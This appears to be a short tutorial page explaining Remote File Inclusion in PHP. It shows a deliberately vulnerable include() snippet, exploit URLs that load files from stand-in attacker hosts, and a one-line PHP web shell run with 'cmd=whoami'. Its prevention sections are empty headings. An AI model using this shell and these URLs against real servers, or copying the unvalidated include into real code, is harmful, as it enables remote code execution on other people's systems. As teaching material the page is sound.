📂 Remote File Inclusion (RFI)

Learn how attackers inject remote files into vulnerable web apps – and how to prevent it.

What is Remote File Inclusion?

RFI is a critical web vulnerability that allows an attacker to include and execute a malicious file from a remote server, usually due to insecure use of dynamic file loading functions in web applications. It is most commonly found in PHP apps using include() or require() functions without proper validation.

💥 How Does RFI Work?

Consider the following vulnerable PHP code:

// vulnerable.php
<?php
  $page = $_GET['page'];
  include($page);  // No validation
?>

An attacker could exploit this by providing a remote URL:

https://vulnerable-site.com/vulnerable.php?page=http://attacker.com/shell.txt

If the remote file contains malicious PHP code, it will be executed on the server.

📚 RFI vs LFI: What's the Difference?

RFI (Remote File Inclusion) loads files from remote URLs like http://evil.com/shell.txt.
LFI (Local File Inclusion) includes local files like /etc/passwd or ../../index.php.

🛠️ Step-by-Step Exploitation Example

  1. Find a parameter that loads files dynamically (e.g. ?page=)
  2. Test with a basic file: ?page=http://attacker.com/info.txt
  3. Prepare a remote malicious script with PHP payload: 
    // shell.txt
<?php system($_GET['cmd']); ?>
  4. Trigger the payload: ?page=http://attacker.com/shell.txt&cmd=whoami

If vulnerable, the server will execute the remote code and return the result.

🌐 Real-World Case Study

In 2007, a vulnerability in PHP-Nuke allowed attackers to inject remote shells via RFI. Thousands of websites were compromised. Even today, many legacy apps using older PHP versions remain exposed if allow_url_include is enabled.

✅ Prevention Techniques

📌 Tools & Resources

💡 Pro Tips